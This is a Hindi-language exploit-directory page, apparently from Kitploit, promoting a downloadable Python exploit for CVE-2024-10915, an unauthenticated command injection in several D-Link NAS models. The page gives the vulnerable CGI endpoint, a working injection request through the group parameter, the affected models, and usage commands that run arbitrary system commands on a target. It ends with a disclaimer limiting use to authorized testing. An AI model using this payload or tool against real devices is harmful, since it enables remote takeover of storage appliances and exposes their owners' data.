Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10915 — # CVE-2024-10915 के लिए Python-आधारित एक्सप्लॉइट यह D-Link NAS उपकरणों में कमांड इंजेक्शन भेद्यता है। `/cgi-bin/account_mgr.cgi` एंडपॉइंट के माध्यम से मनमाने सिस्टम कमांड निष्पादित करता है, जो अधिकृत सुरक्षा परीक्षण के लिए है। | Kitploit
उपकरण/GitHubGitHub/r0otk3r/cve-2024-10915
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग
GitHubr0otk3r/cve-2024-10915

CVE-2024-10915

# CVE-2024-10915 के लिए Python-आधारित एक्सप्लॉइट यह D-Link NAS उपकरणों में कमांड इंजेक्शन भेद्यता है। `/cgi-bin/account_mgr.cgi` एंडपॉइंट के माध्यम से मनमाने सिस्टम कमांड निष्पादित करता है, जो अधिकृत सुरक्षा परीक्षण के लिए है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-10915 - D-Link NAS कमांड इंजेक्शन एक्सप्लॉइट

यह Python-आधारित एक्सप्लॉइट /cgi-bin/account_mgr.cgi?cmd=cgi_user_add एंडपॉइंट के माध्यम से कई D-Link NAS उत्पादों में कमांड इंजेक्शन भेद्यता को लक्षित करता है। यह भेद्यता बिना प्रमाणीकरण वाले हमलावरों को प्रभावित डिवाइस पर मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देती है।

विवरण

CVE-2024-10915 कई D-Link NAS मॉडलों को प्रभावित करता है। एक हमलावर cgi_user_add कमांड में group पैरामीटर के माध्यम से कमांड इंजेक्ट कर सकता है, जिससे रिमोट कोड निष्पादन होता है।

प्रभावित उत्पाद

  • D-Link DNS-320

  • D-Link DNS-320LW

  • D-Link DNS-325

  • D-Link DNS-340L

कमजोर एंडपॉइंट: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

उदाहरण:

http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

आवश्यकताएँ

  • Python 3.x

  • requests लाइब्रेरी

आवश्यक निर्भरताएँ स्थापित करें:

pip3 install requests

उपयोग

usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]

विकल्प:

विकल्पविवरण
-u / --urlलक्ष्य बेस URL (जैसे http://192.168.1.100)
-c / --commandडिवाइस पर निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)
-p / --proxyHTTP प्रॉक्सी का उपयोग करें (जैसे http://127.0.0.1:8080)
-o / --outputHTTP प्रतिक्रिया को फ़ाइल में सहेजें
-l / --listप्रभावित D-Link NAS उत्पादों की सूची दिखाएँ

उदाहरण 1

python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 
id

उदाहरण 2

python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 
uname

उदाहरण 3

python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 
ifconfig

⚠️ अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। इस टूल का उपयोग उन नेटवर्कों या सिस्टमों पर न करें जिनके लिए आपके पास स्पष्ट अनुमति नहीं है। लेखक किसी भी दुरुपयोग या हुई क्षति के लिए कोई ज़िम्मेदारी नहीं लेते हैं।


आधिकारिक चैनल

  • YouTube @rootctf
  • X @r0otk3r
टूल डाउनलोड करें